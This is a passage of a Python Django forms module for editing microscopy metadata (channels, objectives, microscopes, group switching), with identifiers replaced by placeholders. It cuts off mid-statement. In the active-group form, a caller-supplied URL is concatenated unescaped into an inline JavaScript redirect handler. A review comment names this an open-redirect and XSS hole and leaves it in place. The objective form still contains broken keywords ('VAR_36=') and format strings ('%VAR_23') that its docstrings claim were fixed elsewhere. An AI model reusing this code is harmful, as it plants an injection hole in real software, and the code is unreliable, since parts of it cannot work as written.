        # Multi-select for one object type; preselect when initial["selected"]
        # provides entries, otherwise (e.g. KeyError) fall back to no initial.
        try:
            self.fields[field_name] = ObjectModelMultipleChoiceField(
                queryset=queryset,
                initial=initial["selected"][key],
                widget=forms.SelectMultiple(attrs={"size": 10}),
                required=False,
            )
        except Exception:
            self.fields[field_name] = ObjectModelMultipleChoiceField(
                queryset=queryset,
                widget=forms.SelectMultiple(attrs={"size": 10}),
                required=False,
            )
class CLASS_7(CLASS_6):
    """Object-selection form with a hidden comma-separated tag-id field.

    BUG FIX: ``FUNC_3`` previously did ``map(int, ...)`` — on Python 3 that
    is a *lazy* iterator, so invalid ids raised outside the try/except and
    escaped as ValueError instead of ValidationError. Materializing the
    list inside the try restores the intended validation.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_7, self).__init__(*VAR_11, **VAR_12)

    # Hidden comma-separated list of tag ids.
    VAR_18 = forms.CharField(required=False, widget=forms.HiddenInput)

    def FUNC_3(self):
        """Return the tag ids as a list of ints ([] when empty)."""
        VAR_33 = self.cleaned_data["tags"]
        if not VAR_33:
            return []
        try:
            VAR_33 = [int(tag_id) for tag_id in VAR_33.split(",")]
        except Exception:
            raise forms.ValidationError()
        return VAR_33
class CLASS_8(forms.Form):
    """One all-hidden-inputs row used by the VAR_4 formset below."""

    # Required row identifier.
    VAR_19 = forms.CharField(required=True, widget=forms.HiddenInput)
    # Optional free-text value.
    VAR_16 = forms.CharField(required=False, widget=forms.HiddenInput)
    # Optional positive integer (minimum 1).
    VAR_20 = forms.IntegerField(min_value=1, required=False, widget=forms.HiddenInput)


# Formset of CLASS_8 rows; extra=0 renders no blank extra rows.
VAR_4 = formset_factory(CLASS_8, extra=0)
class CLASS_9(CLASS_6):
    """Object-selection form extended with file annotations: a multi-select
    of existing files plus an optional new upload."""

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_9, self).__init__(*VAR_11, **VAR_12)
        # Existing file annotations available to attach (multi-select).
        self.fields["files"] = AnnotationModelMultipleChoiceField(
            queryset=VAR_12["initial"]["files"],
            widget=forms.SelectMultiple(attrs={"size": 8, "class": "existing"}),
            required=False,
        )

    # Optional newly-uploaded file.
    VAR_21 = forms.FileField(required=False)
class CLASS_10(CLASS_6):
    """Object-selection form plus a required multi-line text field."""

    VAR_22 = forms.CharField(widget=forms.Textarea(attrs={"rows": 2, "cols": 39}))
class CLASS_11(forms.Form):
    """Active-group switcher: a select of the user's groups whose onchange
    navigates the browser to the group-switch view.

    SECURITY NOTE(review): the try-branch splices
    ``kwargs["initial"]["url"]`` directly into the generated JavaScript /
    redirect target with no validation or escaping. If that value can be
    influenced by the request (e.g. a ``?url=`` parameter), this is an
    open-redirect and potential XSS vector — the URL should be validated
    as local/safe before being embedded here. Flagged, not changed.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_11, self).__init__(*VAR_11, **VAR_12)
        try:
            # With a return-url: redirect carries ?url=<caller-supplied>.
            self.fields["active_group"] = GroupModelChoiceField(
                queryset=VAR_12["initial"]["mygroups"],
                initial=VAR_12["initial"]["activeGroup"],
                empty_label=None,
                widget=forms.Select(
                    attrs={
                        "onchange": (
                            "window.location.href='"
                            + reverse(viewname="change_active_group")
                            + "?url="
                            + VAR_12["initial"]["url"]
                            + "&active_group='"
                            "+this.options[this.selectedIndex].value"
                        )
                    }
                ),
            )
        except Exception:
            # No "url" available: same control without the return-url param.
            self.fields["active_group"] = GroupModelChoiceField(
                queryset=VAR_12["initial"]["mygroups"],
                initial=VAR_12["initial"]["activeGroup"],
                empty_label=None,
                widget=forms.Select(
                    attrs={
                        "onchange": (
                            "window.location.href='"
                            + reverse(viewname="change_active_group")
                            + "?active_group='"
                            "+this.options[this.selectedIndex].value"
                        )
                    }
                ),
            )
        self.fields.keyOrder = ["active_group"]
class CLASS_12(forms.Form):
    """Field-index chooser: one select listing Field#1..Field#N for the
    given (start, end) range; onchange calls the client-side changeField().

    BUG FIX: the ChoiceField was called with the corrupted keyword
    ``VAR_36=tuple(...)`` (identifier-normalization damage) — ChoiceField
    has no such argument, so construction raised TypeError. Restored to
    the ``choices=`` keyword.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_12, self).__init__(*VAR_11, **VAR_12)
        VAR_34, VAR_35 = VAR_12["initial"]["range"]
        # 1-based display labels regardless of the absolute index range.
        VAR_36 = [(str(i), "Field#%i" % (i - VAR_34 + 1)) for i in range(VAR_34, VAR_35 + 1)]
        self.fields["index"] = forms.ChoiceField(
            choices=tuple(VAR_36),
            widget=forms.Select(
                attrs={
                    "onchange": ("changeField(this.options[this.selectedIndex].value);")
                }
            ),
        )
        self.fields.keyOrder = ["index"]
def FUNC_0(VAR_5, VAR_6, VAR_7=False):
    """Build the javascript: onchange snippet that saves one metadata field.

    VAR_5: object id; VAR_6: field name; VAR_7: True when the widget is a
    <select> (read the chosen option's value), False for plain inputs.
    """
    value_expr = (
        "this.options[this.selectedIndex].value);" if VAR_7 else "this.value);"
    )
    return "javascript:FUNC_0(" + str(VAR_5) + ", '" + VAR_6 + "', " + value_expr
import types


def FUNC_1(VAR_8, VAR_9=True):
    """Disable a form field's widget; optionally tag it with the
    "disabled-metadata" CSS class (the default)."""
    attrs = VAR_8.widget.attrs
    attrs["disabled"] = True
    if not VAR_9:
        return
    attrs["class"] = "disabled-metadata"
class CLASS_13(forms.Form):
    """Channel metadata edit form (one per logical channel).

    Each channel attribute becomes either an editable CharField / choice
    field with an ``onchange`` save hook, or a read-only "N/A" CharField
    when the channel (or the specific value) cannot be read. The ten
    near-identical try/if/else/except blocks are factored into
    ``_text_field`` / ``_choice_field``; the callables keep every raising
    expression inside the helper's try, preserving the original fallback
    behavior.

    BUG FIXES:
    - the "name" success branch called ``FUNC_0(VAR_37.id)`` without the
      required field-name argument (TypeError), so a populated name always
      fell through to the "N/A" fallback; now passes "name".
    - unit labels used the corrupted format ``"%VAR_23"`` (normalization
      damage of ``"%s"``), which made the ``%`` formatting raise and the
      field fall back to "N/A"; restored to ``"%s"``.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_13, self).__init__(*VAR_11, **VAR_12)
        VAR_37 = VAR_12["initial"]["logicalChannel"]
        VAR_38 = VAR_12["initial"]

        self._text_field(
            "name",
            lambda: VAR_37 is not None,
            lambda: VAR_37.name,
            lambda: FUNC_0(VAR_37.id, "name"),
        )
        self._text_field(
            "excitationWave",
            lambda: VAR_37 is not None,
            lambda: VAR_38["exWave"].getValue(),
            lambda: FUNC_0(VAR_37.id, "name"),
            success_label=lambda: "Excitation (%s)" % VAR_38["exWave"].getSymbol(),
            else_label="Excitation",
            except_label="Excitation",
        )
        self._text_field(
            "emissionWave",
            lambda: VAR_37 is not None,
            lambda: VAR_38["emWave"].getValue(),
            lambda: FUNC_0(VAR_37.id, "name"),
            success_label=lambda: "Emission (%s)" % VAR_38["emWave"].getSymbol(),
            else_label="Emission",
            except_label="Emission",
        )
        self._text_field(
            "ndFilter",
            lambda: VAR_37 is not None and VAR_37.ndFilter is not None,
            lambda: formatPercentFraction(VAR_37.ndFilter),
            lambda: FUNC_0(VAR_37.id, "name"),
            success_label=lambda: "ND filter (%)",
            else_label="ND filter (%)",
            except_label="ND filter (%)",
            VAR_9=False,
        )
        self._text_field(
            "pinHoleSize",
            lambda: VAR_37 is not None and VAR_37.pinHoleSize is not None,
            lambda: VAR_37.pinHoleSize.getValue(),
            lambda: FUNC_0(VAR_37.id, "name"),
            success_label=lambda: "Pin hole size (%s)" % VAR_37.pinHoleSize.getSymbol(),
            else_label="Pin hole size",
            except_label="Pin hole size",
            VAR_9=False,
        )
        self._text_field(
            "fluor",
            lambda: VAR_37 is not None,
            lambda: VAR_37.fluor,
            lambda: FUNC_0(VAR_37.id, "name"),
            VAR_9=False,
        )
        self._choice_field(
            "illumination",
            VAR_38["illuminations"],
            lambda: VAR_37.getIllumination(),
            lambda: VAR_37.getIllumination(),
            lambda: FUNC_0(VAR_37.id, "illumination", VAR_7=True),
            VAR_9=False,
        )
        self._choice_field(
            "contrastMethod",
            VAR_38["contrastMethods"],
            lambda: VAR_37.contrastMethod,
            lambda: VAR_37.getContrastMethod(),
            lambda: FUNC_0(VAR_37.id, "contrastMethod", VAR_7=True),
            label="Contrast method",
            except_label="Contrast method",
        )
        self._choice_field(
            "mode",
            VAR_38["modes"],
            lambda: VAR_37.getMode(),
            lambda: VAR_37.getMode().value,
            lambda: FUNC_0(VAR_37.id, "mode", VAR_7=True),
        )
        self._text_field(
            "pockelCellSetting",
            lambda: VAR_37.pockelCellSetting is not None,
            lambda: VAR_37.pockelCellSetting,
            lambda: FUNC_0(VAR_37.id, "name"),
            success_label=lambda: "Pockel cell",
            else_label="Pockel cell",
            except_label="Pockel cell",
        )
        self.fields.keyOrder = [
            "name",
            "excitationWave",
            "emissionWave",
            "ndFilter",
            "pinHoleSize",
            "fluor",
            "illumination",
            "contrastMethod",
            "mode",
            "pockelCellSetting",
        ]

    def _text_field(
        self,
        name,
        present_cb,
        initial_cb,
        onchange_cb,
        success_label=None,
        else_label=None,
        except_label=None,
        VAR_9=True,
    ):
        # CharField for one channel attribute; any exception inside the try
        # (missing channel, unreadable value, label formatting) degrades to
        # a read-only "N/A" placeholder, as in the original code.
        try:
            extra = {"required": False}
            if present_cb():
                extra["initial"] = initial_cb()
                if success_label is not None:
                    extra["label"] = success_label()
            elif else_label is not None:
                extra["label"] = else_label
            widget = forms.TextInput(attrs={"size": 25, "onchange": onchange_cb()})
            self.fields[name] = forms.CharField(max_length=100, widget=widget, **extra)
        except Exception:
            extra = {"required": False, "initial": "N/A"}
            if except_label is not None:
                extra["label"] = except_label
            self.fields[name] = forms.CharField(
                max_length=10, widget=forms.TextInput(attrs={"size": 25}), **extra
            )
        FUNC_1(self.fields[name], VAR_9=VAR_9)

    def _choice_field(
        self,
        name,
        queryset,
        present_cb,
        initial_cb,
        onchange_cb,
        label=None,
        except_label=None,
        VAR_9=True,
    ):
        # MetadataModelChoiceField with "Not set" empty label; same "N/A"
        # CharField fallback as the text fields on any error.
        try:
            current = present_cb()
            widget = forms.Select(attrs={"onchange": onchange_cb()})
            extra = {"required": False}
            if label is not None:
                extra["label"] = label
            if current is not None:
                extra["initial"] = initial_cb()
            self.fields[name] = MetadataModelChoiceField(
                queryset=queryset, empty_label="Not set", widget=widget, **extra
            )
        except Exception:
            extra = {"required": False}
            if except_label is not None:
                extra["label"] = except_label
            self.fields[name] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                **extra
            )
        FUNC_1(self.fields[name], VAR_9=VAR_9)
class CLASS_14(forms.Form):
    """Dichroic metadata edit form (manufacturer, model, serial, lot).

    The four identical try/if/else/except blocks are factored into
    ``_add_field``.

    BUG FIX: the serialNumber and lotNumber fields' ``onchange`` previously
    passed the attribute *value* (``dichroic.serialNumber`` /
    ``dichroic.lotNumber``) as the object id to FUNC_0, unlike the
    manufacturer/model fields which correctly pass ``dichroic.id``; all
    four now use the id.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_14, self).__init__(*VAR_11, **VAR_12)
        VAR_50 = VAR_12["initial"]["dichroic"]
        # Original creation order; keyOrder below sets the display order.
        for field_name, field_label in (
            ("manufacturer", None),
            ("model", None),
            ("serialNumber", "Serial number"),
            ("lotNumber", "Lot number"),
        ):
            self._add_field(VAR_50, field_name, field_label)
        self.fields.keyOrder = ["model", "manufacturer", "serialNumber", "lotNumber"]

    def _add_field(self, VAR_50, field_name, field_label):
        # One editable CharField per dichroic attribute; read-only "N/A"
        # fallback when the dichroic is missing or the value is unreadable.
        extra = {"required": False}
        if field_label is not None:
            extra["label"] = field_label
        try:
            value = getattr(VAR_50, field_name)
            widget = forms.TextInput(
                attrs={"size": 25, "onchange": FUNC_0(VAR_50.id, field_name)}
            )
            if value is not None:
                self.fields[field_name] = forms.CharField(
                    max_length=100, widget=widget, initial=value, **extra
                )
            else:
                self.fields[field_name] = forms.CharField(
                    max_length=100, widget=widget, **extra
                )
        except Exception:
            self.fields[field_name] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                **extra
            )
        FUNC_1(self.fields[field_name])
class CLASS_15(forms.Form):
    """Microscope metadata edit form (model/manufacturer/serial/lot + type).

    The four identical text-field blocks are factored into
    ``_add_text_field``; the type drop-down keeps its own helper.

    BUG FIXES:
    - the serialNumber field's ``onchange`` previously saved under the
      "lotNumber" key (copy-paste), silently overwriting the wrong
      attribute; it now saves under "serialNumber".
    - the lotNumber field was labelled "Serial number" in its else/except
      branches; it is now consistently "Lot number".
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_15, self).__init__(*VAR_11, **VAR_12)
        VAR_56 = VAR_12["initial"]["microscope"]
        for field_name, field_label in (
            ("model", None),
            ("manufacturer", None),
            ("serialNumber", "Serial number"),
            ("lotNumber", "Lot number"),
        ):
            self._add_text_field(VAR_56, field_name, field_label)
        self._add_type_field(VAR_56, VAR_12["initial"]["microscopeTypes"])
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "type",
        ]

    def _add_text_field(self, VAR_56, field_name, field_label):
        # One editable CharField per microscope attribute; read-only "N/A"
        # fallback when the microscope is missing or the value unreadable.
        extra = {"required": False}
        if field_label is not None:
            extra["label"] = field_label
        try:
            value = getattr(VAR_56, field_name)
            widget = forms.TextInput(
                attrs={"size": 25, "onchange": FUNC_0(VAR_56.id, field_name)}
            )
            if value is not None:
                self.fields[field_name] = forms.CharField(
                    max_length=100, widget=widget, initial=value, **extra
                )
            else:
                self.fields[field_name] = forms.CharField(
                    max_length=100, widget=widget, **extra
                )
        except Exception:
            self.fields[field_name] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                **extra
            )
        FUNC_1(self.fields[field_name])

    def _add_type_field(self, VAR_56, type_queryset):
        # Microscope-type drop-down; "N/A" CharField fallback on any error.
        try:
            current = VAR_56.getMicroscopeType()
            widget = forms.Select(
                attrs={"onchange": FUNC_0(VAR_56.id, "type", VAR_7=True)}
            )
            if current is not None:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=type_queryset,
                    empty_label="Not set",
                    widget=widget,
                    initial=current.value,
                    required=False,
                )
            else:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=type_queryset,
                    empty_label="Not set",
                    widget=widget,
                    required=False,
                )
        except Exception:
            self.fields["type"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
        FUNC_1(self.fields["type"])
class CLASS_16(forms.Form):
    """Form for editing the metadata of an Objective.

    Every field is built from ``kwargs["initial"]["objective"]``: when the
    corresponding attribute is set, the field is pre-populated with it;
    otherwise an empty editable field of the same shape is created.  Any
    failure while reading the metadata (missing key or attribute, null
    unit, ...) drops into the ``except`` branch, which renders a short
    "N/A" placeholder field instead.

    ``FUNC_0(id, name, ...)`` produces the JavaScript used as the widget's
    ``onchange`` handler (it is always given the owning object's id and
    the metadata field name); ``FUNC_1`` is applied to every field after
    creation.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_16, self).__init__(*VAR_11, **VAR_12)
        # -- model ---------------------------------------------------------
        try:
            if VAR_12["initial"]["objective"].model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "model"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "model"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["model"])
        # -- manufacturer --------------------------------------------------
        try:
            if VAR_12["initial"]["objective"].manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "manufacturer"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "manufacturer"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["manufacturer"])
        # -- serialNumber --------------------------------------------------
        try:
            if VAR_12["initial"]["objective"].serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "serialNumber"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "serialNumber"
                            ),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
            FUNC_1(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            FUNC_1(self.fields["serialNumber"])
        # -- lotNumber -----------------------------------------------------
        try:
            if VAR_12["initial"]["objective"].lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # Fix: FUNC_0 takes the owning object's id as its
                            # first argument (see every sibling field); this
                            # previously passed the lotNumber value itself.
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "lotNumber"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # Fix: previously read
                            # kwargs["initial"]["logicalchannel"], a key not
                            # supplied to this form, so this branch always
                            # raised and fell through to the "N/A" fallback.
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "lotNumber"
                            ),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
            FUNC_1(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            FUNC_1(self.fields["lotNumber"])
        # -- nominalMagnification ------------------------------------------
        try:
            if VAR_12["initial"]["objective"].nominalMagnification is not None:
                self.fields["nominalMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "nominalMagnification",
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].nominalMagnification,
                    label="Nominal magnification",
                    required=False,
                )
            else:
                self.fields["nominalMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "nominalMagnification",
                            ),
                        }
                    ),
                    label="Nominal magnification",
                    required=False,
                )
            FUNC_1(self.fields["nominalMagnification"])
        except Exception:
            self.fields["nominalMagnification"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Nominal magnification",
                required=False,
            )
            FUNC_1(self.fields["nominalMagnification"])
        # -- calibratedMagnification ---------------------------------------
        try:
            if VAR_12["initial"]["objective"].calibratedMagnification is not None:
                self.fields["calibratedMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "calibratedMagnification",
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].calibratedMagnification,
                    label="Calibrated magnification",
                    required=False,
                )
            else:
                self.fields["calibratedMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "calibratedMagnification",
                            ),
                        }
                    ),
                    label="Calibrated magnification",
                    required=False,
                )
            FUNC_1(self.fields["calibratedMagnification"])
        except Exception:
            self.fields["calibratedMagnification"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Calibrated magnification",
                required=False,
            )
            FUNC_1(self.fields["calibratedMagnification"])
        # -- lensNA --------------------------------------------------------
        try:
            if VAR_12["initial"]["objective"].lensNA is not None:
                self.fields["lensNA"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "lensNA"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].lensNA,
                    label="Lens NA",
                    required=False,
                )
            else:
                # NOTE(review): unlike the other branches this one sets no
                # label, so the default field label is used — confirm intended.
                self.fields["lensNA"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "lensNA"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["lensNA"])
        except Exception:
            self.fields["lensNA"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lens NA",
                required=False,
            )
            FUNC_1(self.fields["lensNA"])
        # -- immersion (enumeration) ---------------------------------------
        try:
            if VAR_12["initial"]["objective"].getImmersion() is not None:
                self.fields["immersion"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["immersions"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "immersion",
                                VAR_7=True,
                            )
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].getImmersion().value,
                    required=False,
                )
            else:
                self.fields["immersion"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["immersions"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "immersion",
                                VAR_7=True,
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["immersion"])
        except Exception:
            self.fields["immersion"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["immersion"])
        # -- correction (enumeration) --------------------------------------
        try:
            if VAR_12["initial"]["objective"].getCorrection() is not None:
                self.fields["correction"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["corrections"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "correction",
                                VAR_7=True,
                            )
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].getCorrection().value,
                    required=False,
                )
            else:
                self.fields["correction"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["corrections"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id,
                                "correction",
                                VAR_7=True,
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["correction"])
        except Exception:
            self.fields["correction"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["correction"])
        # -- workingDistance (unit-bearing value) --------------------------
        try:
            if VAR_12["initial"]["objective"].workingDistance is not None:
                self.fields["workingDistance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "workingDistance"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].workingDistance.getValue(),
                    label=(
                        "Working distance (%VAR_23)"
                        % VAR_12["initial"]["objective"].workingDistance.getSymbol()
                    ),
                    required=False,
                )
            else:
                self.fields["workingDistance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "workingDistance"
                            ),
                        }
                    ),
                    label="Working distance",
                    required=False,
                )
            FUNC_1(self.fields["workingDistance"])
        except Exception:
            self.fields["workingDistance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Working distance",
                required=False,
            )
            FUNC_1(self.fields["workingDistance"])
        # -- iris (boolean choice) -----------------------------------------
        # NOTE(review): BOOLEAN_CHOICES is not defined on this class in the
        # visible source; if it is absent at runtime the AttributeError drops
        # this field into the "N/A" fallback below — confirm.
        try:
            if VAR_12["initial"]["objective"].getIris() is not None:
                self.fields["iris"] = forms.ChoiceField(
                    VAR_36=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "iris", VAR_7=True
                            )
                        }
                    ),
                    initial=VAR_12["initial"]["objective"].getIris().value,
                    required=False,
                )
            else:
                self.fields["iris"] = forms.ChoiceField(
                    VAR_36=self.BOOLEAN_CHOICES,
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objective"].id, "iris", VAR_7=True
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["iris"])
        except Exception:
            self.fields["iris"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["iris"])
        # Fixed display order of the fields.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "nominalMagnification",
            "calibratedMagnification",
            "lensNA",
            "immersion",
            "correction",
            "workingDistance",
            "iris",
        ]
class CLASS_17(CLASS_16):
    """Form for editing ObjectiveSettings metadata.

    Extends the Objective form (CLASS_16) with the three settings-level
    fields (correction collar, medium, refractive index), read from
    ``kwargs["initial"]["objectiveSettings"]``.  As in the base class,
    any failure while reading the metadata falls back to an "N/A"
    placeholder field via the ``except`` branch.
    """

    # Choices for boolean-valued selects: unset / True / False.
    VAR_24 = (
        ("", "---------"),
        ("True", "True"),
        ("False", "False"),
    )
    def __init__(self, *VAR_11, **VAR_12):
        # Builds all the Objective fields first, then appends the
        # ObjectiveSettings-specific ones.
        super(CLASS_17, self).__init__(*VAR_11, **VAR_12)
        # -- correctionCollar ----------------------------------------------
        try:
            if VAR_12["initial"]["objectiveSettings"].correctionCollar is not None:
                self.fields["correctionCollar"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objectiveSettings"].id,
                                "correctionCollar",
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objectiveSettings"].correctionCollar,
                    label="Correction collar",
                    required=False,
                )
            else:
                self.fields["correctionCollar"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objectiveSettings"].id,
                                "correctionCollar",
                            ),
                        }
                    ),
                    label="Correction collar",
                    required=False,
                )
            FUNC_1(self.fields["correctionCollar"])
        except Exception:
            self.fields["correctionCollar"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Correction collar",
                required=False,
            )
            FUNC_1(self.fields["correctionCollar"])
        # -- medium (enumeration) ------------------------------------------
        try:
            if VAR_12["initial"]["objectiveSettings"].getMedium() is not None:
                self.fields["medium"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objectiveSettings"].id,
                                "medium",
                                VAR_7=True,
                            )
                        }
                    ),
                    initial=VAR_12["initial"]["objectiveSettings"].getMedium().value,
                    required=False,
                )
            else:
                self.fields["medium"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["mediums"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objectiveSettings"].id,
                                "medium",
                                VAR_7=True,
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["medium"])
        except Exception:
            self.fields["medium"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["medium"])
        # -- refractiveIndex -----------------------------------------------
        try:
            if VAR_12["initial"]["objectiveSettings"].refractiveIndex is not None:
                self.fields["refractiveIndex"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objectiveSettings"].id,
